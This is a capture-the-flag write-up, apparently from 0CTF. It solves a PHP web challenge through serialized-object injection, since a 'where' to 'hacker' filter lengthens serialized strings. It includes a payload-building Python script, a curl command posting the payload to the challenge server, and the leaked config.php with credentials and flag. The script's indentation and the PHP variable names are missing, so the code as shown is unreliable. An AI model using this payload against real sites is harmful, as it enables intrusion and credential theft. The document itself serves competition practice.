- We can post any string to update.php as "nickname" array.
- A object was broken with serialize() and filter().
- String length increased a char as filter() replace a serialized string from 'where' to 'hacker'.
nickname.py
#!/usr/bin/python
# -*- coding:utf-8 -*-
import urllib, urllib2
# --- main ---
def main():
suffix = '";}s:5:"photo";s:10:"config.php'
string = "where" * len(suffix) + suffix
print "[+] attack with string: %s" % string
if __name__ == '__main__':
main()I posted generated string to update.php on 'nickname[]' with curl.
$ curl -v -F photo=@./hoge -F phone=11111111111 -F email="[email protected]" -F nickname[]=wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere;}s:5:photo;s:10:config.php -b "PHPSESSID=qqvl7cuj1lru13a3rimfjme4u5" http://202.120.7.203:8888/update.php
After update, we can get flag in src of profile's img tag. It is config.php which was encoded as base64.
config.php
<?php
['hostname'] = '127.0.0.1';
['username'] = '0ctf';
['password'] = 'oh-my-****-web';
['database'] = '0CTF_WEB';
= '0ctf{fa717b49649fbb9c0dd0d1663469a871}';
?>